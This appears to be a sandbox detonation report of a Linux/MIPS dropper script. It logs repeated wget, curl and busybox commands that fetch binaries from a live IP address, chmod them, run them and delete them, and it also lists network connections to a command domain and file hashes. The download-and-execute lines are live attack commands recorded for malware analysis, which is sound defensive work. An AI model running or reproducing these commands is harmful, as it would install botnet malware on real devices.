[wget http://87.120.126.196/bins/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]

/bin/chmod

[chmod 777 Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]

/tmp/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i

[./Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]

/bin/rm

[rm Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]

/usr/bin/wget

[wget http://87.120.126.196/bins/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]

/bin/chmod

[chmod 777 BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]

/tmp/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F

[./BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]

/bin/rm

[rm BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]

/usr/bin/wget

[wget http://87.120.126.196/bins/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]

/bin/chmod

[chmod 777 HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]

/tmp/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E

[./HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]

/bin/rm

[rm HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]

/usr/bin/wget

[wget http://87.120.126.196/bins/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]

/bin/chmod

[chmod 777 R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]

/tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV

[./R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]

/bin/rm

[rm R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]

/usr/bin/wget

[wget http://87.120.126.196/bins/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]

/bin/chmod

[chmod 777 NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]

/tmp/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby

[./NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]

/bin/rm

[rm NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]

/usr/bin/wget

[wget http://87.120.126.196/bins/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]

/bin/chmod

[chmod 777 LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]

/tmp/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA

[./LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]

/bin/rm

[rm LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]

/usr/bin/wget

[wget http://87.120.126.196/bins/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]

/bin/chmod

[chmod 777 yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]

/tmp/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D

[./yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]

/bin/rm

[rm yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]

/usr/bin/wget

[wget http://87.120.126.196/bins/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]

/bin/chmod

[chmod 777 5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]

/tmp/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif

[./5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]

/bin/rm

[rm 5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]

/usr/bin/wget

[wget http://87.120.126.196/bins/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]

/bin/chmod

[chmod 777 GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]

/tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb

[./GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]

/bin/rm

[rm GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]

/usr/bin/wget

[wget http://87.120.126.196/bins/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]

/bin/chmod

[chmod 777 pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]

/tmp/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe

[./pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]

/bin/rm

[rm pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]

/usr/bin/wget

[wget http://87.120.126.196/bins/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]

/bin/chmod

[chmod 777 4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]

/tmp/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK

[./4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]

/bin/rm

[rm 4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]

/usr/bin/wget

[wget http://87.120.126.196/bins/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]

/bin/chmod

[chmod 777 NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]

/tmp/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68

[./NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]

/bin/rm

[rm NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]

/usr/bin/wget

[wget http://87.120.126.196/bins/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]

/bin/chmod

[chmod 777 Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]

/tmp/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i

[./Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]

/bin/rm

[rm Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]

/usr/bin/wget

[wget http://87.120.126.196/bins/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]

/bin/chmod

[chmod 777 BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]

/tmp/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F

[./BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]

/bin/rm

[rm BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]

/usr/bin/wget

[wget http://87.120.126.196/bins/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]

/bin/chmod

[chmod 777 HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]

/tmp/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E

[./HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]

/bin/rm

[rm HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]

/usr/bin/wget

[wget http://87.120.126.196/bins/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]

/bin/chmod

[chmod 777 R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]

/tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV

[./R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]

/bin/rm

[rm R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]

/usr/bin/wget

[wget http://87.120.126.196/bins/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]

/bin/chmod

[chmod 777 NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]

/tmp/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby

[./NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]

/bin/rm

[rm NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]

/usr/bin/wget

[wget http://87.120.126.196/bins/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]

/bin/chmod

[chmod 777 LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]

/tmp/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA

[./LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]

/bin/rm

[rm LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]

/usr/bin/wget

[wget http://87.120.126.196/bins/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]

/bin/chmod

[chmod 777 yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]

/tmp/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D

[./yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]

/bin/rm

[rm yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]

/usr/bin/wget

[wget http://87.120.126.196/bins/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]

/bin/chmod

[chmod 777 5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]

/tmp/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif

[./5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]

/bin/rm

[rm 5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]

/usr/bin/wget

[wget http://87.120.126.196/bins/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]

/bin/chmod

[chmod 777 GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]

/tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb

[./GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]

/bin/rm

[rm GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]

/usr/bin/wget

[wget http://87.120.126.196/bins/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]

/bin/chmod

[chmod 777 pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]

/tmp/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe

[./pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]

/bin/rm

[rm pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]

/usr/bin/wget

[wget http://87.120.126.196/bins/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]

/bin/chmod

[chmod 777 4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]

/tmp/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK

[./4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]

/bin/rm

[rm 4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]

/usr/bin/wget

[wget http://87.120.126.196/bins/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]

/bin/chmod

[chmod 777 NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]

/tmp/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68

[./NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]

/bin/rm

[rm NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]

/usr/bin/wget

[wget http://87.120.126.196/bins/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]

/bin/chmod

[chmod 777 b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]

/tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem

[./b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]

/bin/rm

[rm b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]

/usr/bin/wget

[wget http://87.120.126.196/bins/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]

/bin/chmod

[chmod 777 V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]

/tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj

[./V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]

/bin/rm

[rm V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]

Network

Country Destination Domain Proto
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:443 conn.masjesu.zip tcp
BG 87.120.126.196:80 conn.masjesu.zip tcp
BG 87.120.126.196:80 conn.masjesu.zip tcp
BG 87.120.126.196:80 conn.masjesu.zip tcp
BG 87.120.126.196:80 conn.masjesu.zip tcp
BG 87.120.126.196:80 conn.masjesu.zip tcp
BG 87.120.126.196:80 conn.masjesu.zip tcp
BG 87.120.126.196:80 conn.masjesu.zip tcp
BG 87.120.126.196:80 conn.masjesu.zip tcp
BG 87.120.126.196:80 conn.masjesu.zip tcp
BG 87.120.126.196:80 conn.masjesu.zip tcp
BG 87.120.126.196:80 conn.masjesu.zip tcp
BG 87.120.126.196:80 conn.masjesu.zip tcp
BG 87.120.126.196:80 conn.masjesu.zip tcp
BG 87.120.126.196:80 conn.masjesu.zip tcp
BG 87.120.126.196:80 conn.masjesu.zip tcp
BG 87.120.126.196:80 conn.masjesu.zip tcp
BG 87.120.126.196:80 conn.masjesu.zip tcp
BG 87.120.126.196:80 conn.masjesu.zip tcp
BG 87.120.126.196:80 conn.masjesu.zip tcp
BG 87.120.126.196:80 conn.masjesu.zip tcp
BG 87.120.126.196:80 conn.masjesu.zip tcp
BG 87.120.126.196:80 conn.masjesu.zip tcp
BG 87.120.126.196:80 conn.masjesu.zip tcp
BG 87.120.126.196:80 conn.masjesu.zip tcp
BG 87.120.126.196:80 conn.masjesu.zip tcp
BG 87.120.126.196:80 conn.masjesu.zip tcp

Files

/tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem

MD5 64ece99ca4ab1c1405f5a3335d64a960
SHA1 b7395f2320a5bdadb78943b268708965cdbd1d74
SHA256 aaf14287d7a971d4541527262e85e5930bbb7f506cff4808d712843be9f05dae
SHA512 bc169075e50ceffd0ce0cc90513bc2f0d8696c01d4132609e31c782ea6c0a755505891e2e23676dd63c3dd00bf97599a9a7e6230e8c3f5166202f5b9be606d41

/tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj

MD5 3b78bb645b81d600c30713d416f666be
SHA1 23796112f2cce2afb2217498b5ecf2801ab550f2
SHA256 d52f8bcb15a590aa5624c446091f1cd0705b68e4647debaeecf8cfa1fe425bd2
SHA512 9532ede2d78f1f62f291c8d8d4023c9c579a0bdd042ca11af179adcab96ac2eb178ecb34b9e4b99a33f828694b9839abebabd2ef57dd36d1936027bad1987cf9

/var/spool/cron/crontabs/tmp.5cFni0

MD5 852bf050afc662192f63fccfd8c77ea5
SHA1 72ba8a648d16d9a509056cdaf5cff5dbe367414c
SHA256 b7f869cc3bd4458e73d72600cc90f5cadb2169b4263b0edb62360c3a41360dda
SHA512 886a9dbd79b1d2fc61195a44762286d84828d8a78138b7889205df01da965553d73ef39195e8df62175462a544a82b2f58bbd27fc71469d1cb05cf9c3972377f

/tmp/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i

MD5 c20c610e14b8e59f5f8258a55fe7f27d
SHA1 e59a0b83d9882f2770f052a213cad25b0cbd53fc
SHA256 adb7828df990cedc9f301891e725c547656967d827ce9cfdf3f6e8fa8242618b
SHA512 dd8d992edcb5e4dae5e97a1ad12c28560a2cda02dcc1867250de78b0fe0d0f511b7269cb4999c80d6d299b87145bcef5b1587730b496426f14550b6f7a0a59a2

/tmp/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F

MD5 22c527269cbd9b42f4ade79f52757efb
SHA1 c2456188a49af93b0d07af2a7cc1346d5be510bd
SHA256 100042d7138b4348a13c54c191d501d125b7fea7631382e7d0e9d7251057ce97
SHA512 7b7cb4d8307c0437163cdbfa349f1285cfa26c25ec856f8b4d4cebf8f71cae87e74de8f3c0f29ef2789168a4499bfe95007d7d524ed734e3eb4ac0d0e4e09b53

/tmp/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E

MD5 d8e96e2fdd3c610ec19128e18de5abde
SHA1 10cf691ae9779bfeca8b67e75721d0a6f275e4f9
SHA256 f09f8db2883da603f963189ef3b8185b179832de8b2e526ef63fe8b96847cc7b
SHA512 979e0f29d7b65fcf7c4d93ec6fdaa70cdd26d9fa8a526fee7d4cdb028229db06186f89c9b0c93d3112e636c1b65819d46695310c90a1700343c2221df9323592

/tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV

MD5 52f72bcf31899453b40d37a7cbf55f35
SHA1 6dfca1bd70aad3e88713b02ec1669ba5a792456c
SHA256 ed7e61403d47c0319eea05db0cba4d17bfb1594621d6722bfe43cffecacdf495
SHA512 be8b5d14afe30f1ce2f474a20af599a93c3a7543ec301554dd2ffa0225c945d91c3354d777f09ee886a90acfa8ecfa24533de9cf3bcf5f59a44d53ca3c73e967

/tmp/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby

MD5 27a1a1941f224eff6a4babf2495e3692
SHA1 86fae66a698f6280353e470ffadfb64441b03e83
SHA256 ab610b9f57ce293287cf9d4b3d47024ee73c81d8542247e26d1f0db2d5144179
SHA512 cf02927d9313f43ab5d04c7570b71cd722a5772642eac72feccdf4612985e29b399a7bbdff5de65d352b92f168c6934b0f0851a28c58a4814fffe38a0d884934

/tmp/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA

MD5 e9e5d79acad49bbe6c77df0385ec77aa
SHA1 53bbc8b58873cf3117743fab15bd5508421370eb
SHA256 a585eff62bec554d3d7f23aaf9b298a15eb328e8968352339db915ef427f27bd
SHA512 828680ef393890f3c8805527a473f018b212fa1d6c8534fc03bb34f910de4b8d1cd5ce3cef2c06396f225a61794205a61d9fdc6847b14ebd6d7267af9f38f381

/tmp/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D

MD5 8d0f8d45165dc1f3ba334ce75be39621
SHA1 1d5baece9d5af3885276735c3c20d28e161e00ff
SHA256 17441ed8bf165953a69907fb286dd47f2de3f94b744da25c889f86514b904791
SHA512 a8b032ce95f8a70b8c8c0b60b711d379706938c571bcb5cfd7fd16dac64c7d005987169abfd5d0d53b2e1da14eb1bd24cf913c7202f5855a9e4f0d80ce86f5e7

/tmp/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif

MD5 aadb8cc4b6eac7fce760c09262693884
SHA1 b55178ff3605f4bbfc9286d4c8ac445673232217
SHA256 b254f9a6df1e7aae5181abf014b9d574c959ab71bdfd3a2b21022446c583d843
SHA512 5567998215fc9389efeb34ee57e59db4141044bbb1f06cac365565681226836b515c8c8cc17931e72e71d4240a5f433aebb8dfe67b2463ef800f59c86561a62c

/tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb

MD5 54bec959d900ad930dc662f8092da57d
SHA1 9ae7ad9018eeac5aa89bcde68ec683a364ac7d55
SHA256 b62a7cb65dda1cb1ae995b13b62d20289f43b7bc560211484cfdc98c0d9b5f12
SHA512 904a52a1d41d442da07333f9835bb0b1bfcefe9790a566d3b8e03d62e0c788d10b0e17b05865798b1817615b3adb07adfcb13452d96aacf5995b66fae617db40

/tmp/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe

MD5 a7e686eb3f74b104a5520f08cfd54eb5
SHA1 58b5d9571c85c6a7efc4e57111c3b8e2b2c9bb6b
SHA256 617734b61c7e230a72fba8cb8b361bda96cc2d8f40ee358c44a60f1d9b48ab07
SHA512 2767d9a7f71319334578015b133474217901747a6e21b0cdc2d591205c2862220e1730bbcee86ff372b2f2261e25bb64d021f9826ce9332d037b5db1c2ea68df

/tmp/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK

MD5 c97a9c55ddb153e8bfce38f201d2cffb
SHA1 3970452f27327f98c2e3fdcabf0390067b48bd62
SHA256 138a80e023ab0bbb8b2259cf3633c94c39e6f68df2be2ad01ef08590249e662c
SHA512 1734a2e256f90d99d73c70d0faa5b3d24d39a2e9a60dec0c138e75ae0e1793edafb408e1f2aaa2692f40265183faea1d4141b271fb67543633a412817f9fd11e

/tmp/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68

MD5 8fad5e89ce3d2b6159ac2ce2fdf7c084
SHA1 27105a304b9bb7cd8a663d1b4da1d92fd8eea355
SHA256 24689f385c263c42a28dd1498049171abc633faf91b5df2a738a81145d929bd6
SHA512 71689ade77c0ad2ca2db18ed4fd437b6a053b002efadbf6fb479e4f5c85a7830dc0e9cbfef877ca7a91c735a68f28226e7c813c05b329c23668de7edbc99f4bc

Analysis: behavioral3

Detonation Overview

Submitted

2024-10-28 01:53

Reported

2024-10-28 01:55

Platform

debian9-mipsbe-20240611-en

Max time kernel

150s

Max time network

137s

Command Line

[/tmp/bins.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem N/A
N/A /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj N/A
N/A /tmp/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i /tmp/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i N/A
N/A /tmp/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F /tmp/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F N/A
N/A /tmp/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E /tmp/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E N/A
N/A /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV N/A
N/A /tmp/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby /tmp/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby N/A
N/A /tmp/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA /tmp/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA N/A
N/A /tmp/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D /tmp/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D N/A
N/A /tmp/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif /tmp/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif N/A
